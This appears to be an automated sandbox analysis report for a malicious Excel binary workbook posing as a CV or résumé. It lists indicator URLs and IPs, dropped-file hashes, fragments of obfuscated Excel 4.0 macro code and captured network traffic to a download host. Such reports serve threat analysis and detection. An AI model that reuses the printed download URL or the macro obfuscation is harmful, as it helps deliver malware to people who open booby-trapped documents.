                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    PONYNETUShttps://papyrefb2tdk6czd.onion.ly/Get hashmaliciousBrowse
                                                                                                                                                    • 198.251.89.118
                                                                                                                                                    https://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion.lyGet hashmaliciousBrowse
                                                                                                                                                    • 198.251.89.118
                                                                                                                                                    http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion.lyGet hashmaliciousBrowse
                                                                                                                                                    • 198.251.89.118
                                                                                                                                                    SecuriteInfo.com.ArtemisA8D086952534.exeGet hashmaliciousBrowse
                                                                                                                                                    • 167.88.170.103
                                                                                                                                                    http://naturalhub-diet.world/shake.php?a=1nou&c=diet&s=330788,UEMRADAPDP38712Get hashmaliciousBrowse
                                                                                                                                                    • 209.141.40.184
                                                                                                                                                    Quickbooks-52598NOV.wsfGet hashmaliciousBrowse
                                                                                                                                                    • 209.141.42.71
                                                                                                                                                    https://urlprotection-sjl.global.sonicwall.com/click?PV=1&MSGID=202011121700210567221&URLID=12&ESV=10.0.9.5115&IV=96C84E4D3CD6E1B3687B4725D49ACC48&TT=1605200441368&ESN=o9kvhmPqyp%2BcdCbr6%2B5AlC%2FDxZxbBUV7HS3EcP1G5pA%3D&KV=1536961729279&ENCODED_URL=https%3A%2F%2Fteamgrouppcl-my.sharepoint.com%2F%3Au%3A%2Fg%2Fpersonal%2Fnongluck_m_attconsult_com%2FEUMhZAOXwpNGi0mlED8_GS0BlNUmsBRsk_GjzqCnTE543g%3Fdownload%3D1%26utm_content%3DNewClient%26utm_campaign%3Dwebsite%26utm_source%3DJulyWazePromo%26utm_medium%3DEmail&HK=2880A45B85BD1D7F235772EACD5B24AA03960F780A5D1B62240B80C3C42285F3Get hashmaliciousBrowse
                                                                                                                                                    • 209.141.42.71
                                                                                                                                                    E3FvBBM0A6.exeGet hashmaliciousBrowse
                                                                                                                                                    • 199.195.250.165
                                                                                                                                                    jtFF5EQoEE.exeGet hashmaliciousBrowse
                                                                                                                                                    • 209.141.38.71
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20
                                                                                                                                                    WKTniKeGUx.exeGet hashmaliciousBrowse
                                                                                                                                                    • 199.195.250.165
                                                                                                                                                    Reference Number -MT103-002239389960011.exeGet hashmaliciousBrowse
                                                                                                                                                    • 167.88.160.137
                                                                                                                                                    https://bit.ly/3kP7Cn3Get hashmaliciousBrowse
                                                                                                                                                    • 209.141.40.184
                                                                                                                                                    https://bit.ly/2HWBvnhGet hashmaliciousBrowse
                                                                                                                                                    • 209.141.40.184
                                                                                                                                                    run32dll.exeGet hashmaliciousBrowse
                                                                                                                                                    • 198.251.89.29
                                                                                                                                                    servicess64 - Copy.exeGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.126.172
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20
                                                                                                                                                    QvYfyDOcEdLRWwnkTRyImaBLGh.exeGet hashmaliciousBrowse
                                                                                                                                                    • 167.88.170.81
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2C22A230-8394-4D0B-8F76-0E2534DC8A73
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):129952
                                                                                                                                                    Entropy (8bit):5.378334959361757
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:LcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:ZmQ9DQW+zBX8u
                                                                                                                                                    MD5:73F769F0BFC90108C482768AB66936C7
                                                                                                                                                    SHA1:C57F2DBBD12E985DF6B4B7CAFC31805CA5215887
                                                                                                                                                    SHA-256:6FD7E30D3DD4C3178363C959AD02986B709D8F2F516F5408FBD81458FF0250AB
                                                                                                                                                    SHA-512:E58FC93F16CE4374C71951E3639C5E7BEFD153999A9CA9C2CC6FE05CC1E79D9E7BFBC8967B061E753014723C79BC995C523DDE3C607035E567081F76895687E2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-18T03:50:19">.. Build: 16.0.13515.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A88F1E23.jpeg
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1011x567, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):55961
                                                                                                                                                    Entropy (8bit):7.8745563773940725
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QUQt43PNewplZDlm1ajiDPnp3AvLJ03ntpE3g+O0t2DoV:UwbZRQJAd0MrO0UEV
                                                                                                                                                    MD5:102DCD780DA80675F5038CFB42D936CE
                                                                                                                                                    SHA1:417033D6C45E4209909A2EF7B5436673A74FB164
                                                                                                                                                    SHA-256:88F6B392616EA29C03682E3EC079F58C5E8BDC18C7CCB09BA6D5DC0BEDC13EA8
                                                                                                                                                    SHA-512:6478CD1B6F256ABA81374018B751D4ABE03B99B6A1CCB528D97E2ADA7558373161F002CA7D8D6088E897390F9A0F2CE3E925C604B3F855C1EBAA04E53F01ECEF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: ......JFIF.....`.`.....C....................................................................C.......................................................................7...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..~.L.Q._>~.*...M..@.L.2(..RdR..(.2*.....v...F.~=h.z.qv........I.FE.-...dP..I.FE.-...dP..I.FE.-...dP..I.FE.-...dP..I.FE.-..h...L.2(.h..ZL..Z(...)2(.....Va@.E&E....RdR.....L.~F(.v.{R'SH...b.6......"...-...dP..I.FE.-...dP..I.F.@.E(.8...L.2(.h..".....P.E......2(..QI.2(.h.."...L.2(.h.."...L.2(.h.."...L.2(.h.."...L.2(.h.....8.....L..Z)2(...."...Z)2(...."...Z
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\93B10000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):212710
                                                                                                                                                    Entropy (8bit):7.959036658723784
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:iBSIHKSLky2ZOJAd0MrO0UEcXritjYcufzjXK:is1SLk1AJAdFrOpEcX9fzbK
                                                                                                                                                    MD5:406EB3570E89D41780BA695D62C6AD22
                                                                                                                                                    SHA1:2C541B97F8F1C8FB2E9CC06F5C214FC21BDCB978
                                                                                                                                                    SHA-256:A51BA5C748A9F72D146728D9A33E6352A714BC573905F9054646518DD32AD3E9
                                                                                                                                                    SHA-512:8D2E3634A03006F81B18F3CF6F050C919C19B7D5DBA55D382D0506849FF68B91290EC3A7CB3B1A37E36E4DFB7B634EB875073A99CACF3D1276F95C9E0EBD3238
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: ..N.1...+..+.V.NhK.e....-R...{.u.<......).......i<..y.gt6............I..........U..S.x.-[........".V..e]J.s..X....(2..D.q..31.~8..q.]...5.x..&...bN..$..LYu....Z.m.(..1'..'9"...H4;~....zE.Pf........f..y...`........R..CXB.s..|.]{?k....k.K0.v...BF...........T.T..6..._...<.]]....O&Z.....zh0D..hZ..w.8|.l..SO8>...KO8.z..'..=.8...p......o..%:.....Ef...ia._..K.m...~.H...<.......|....WB....{.}@j.".^...)g.. &...iSw.v..i....]T.6x...........PK..........!...x.............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\~$CV.xlsb
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.953202693040947
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                    • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                    File name:CV.xlsb
                                                                                                                                                    File size:234519
                                                                                                                                                    MD5:97978d78a96b89671a7bcb1325ae9ed2
                                                                                                                                                    SHA1:7d3c43d1d8d4657ce177126bbae27647b9e02ee2
                                                                                                                                                    SHA256:3cbc9397d35ec1de513c7d7f747fb6b7773d468244b06bbfc60b4325f1e1b22b
                                                                                                                                                    SHA512:745add1a0d1731dd523926b882b16f84c7f53334f2f9a81a586b4ce38fcbb9fca7e5ddc5806b697243067261e5abfa9bd971563b9b011960d07d546d53a7a0de
                                                                                                                                                    SSDEEP:6144:IPpDLAdBYb0peGXmIJSWGEXGnHDm1ePd2ZOJAd0MrO0UE2i92:+pLIBYbSeGXmvEXGnHDvoAJAdFrOpEpQ
                                                                                                                                                    File Content Preview:PK..........!..*.=............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "CV.xlsb"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=APP.TITLE(BaaCKWySxWnNnysLuRBMSOZqFNOYvqTVCIbjZFzByEovDT),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=ALERT(vwuzXdkPcbruxpPdWHoqLnsGDlyYYzIVwRvUlMmxrK),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CLOSE.ALL(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=ALERT(an),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CANCEL.KEY(TRUE),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 18, 2020 04:50:23.127257109 CET4971380192.168.2.3205.185.113.20
                                                                                                                                                    Nov 18, 2020 04:50:23.305577040 CET8049713205.185.113.20192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:23.305809975 CET4971380192.168.2.3205.185.113.20
                                                                                                                                                    Nov 18, 2020 04:50:23.306298018 CET4971380192.168.2.3205.185.113.20
                                                                                                                                                    Nov 18, 2020 04:50:23.483510017 CET8049713205.185.113.20192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:23.505260944 CET8049713205.185.113.20192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:23.505366087 CET4971380192.168.2.3205.185.113.20
                                                                                                                                                    Nov 18, 2020 04:51:28.531632900 CET8049713205.185.113.20192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:51:28.531857967 CET4971380192.168.2.3205.185.113.20
                                                                                                                                                    Nov 18, 2020 04:52:08.909399033 CET4971380192.168.2.3205.185.113.20
                                                                                                                                                    Nov 18, 2020 04:52:09.087167978 CET8049713205.185.113.20192.168.2.3

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 18, 2020 04:50:05.484215021 CET6511053192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:05.521449089 CET53651108.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:06.552676916 CET5836153192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:06.580528021 CET53583618.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:07.593590975 CET6349253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:07.633985996 CET53634928.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:08.609471083 CET6083153192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:08.636950970 CET53608318.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:10.046732903 CET6010053192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:10.073992014 CET53601008.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:10.920666933 CET5319553192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:10.947772980 CET53531958.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:17.092869997 CET5014153192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:17.128798008 CET53501418.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:18.731102943 CET5302353192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:18.767157078 CET53530238.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:18.965440035 CET4956353192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:19.000965118 CET53495638.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:19.350265026 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:19.388009071 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:20.365075111 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:20.400999069 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:21.380361080 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:21.416122913 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:23.199695110 CET5934953192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:23.227179050 CET53593498.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:23.395859003 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:23.433897972 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:24.378360987 CET5708453192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:24.405793905 CET53570848.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:26.504067898 CET5882353192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:26.531493902 CET53588238.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:27.406240940 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:27.441749096 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:27.762345076 CET5756853192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:27.789632082 CET53575688.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:28.902792931 CET5054053192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:28.929817915 CET53505408.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:31.022787094 CET5436653192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:31.050216913 CET53543668.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:34.294689894 CET5303453192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:34.331670046 CET53530348.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:37.272268057 CET5776253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:37.299457073 CET53577628.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:55.194458961 CET5543553192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:55.222264051 CET53554358.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:58.560962915 CET5071353192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:58.596832037 CET53507138.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:51:12.928491116 CET5613253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:51:12.983022928 CET53561328.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:51:20.473980904 CET5898753192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:51:20.511296034 CET53589878.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:51:51.301814079 CET5657953192.168.2.38.8.8.8
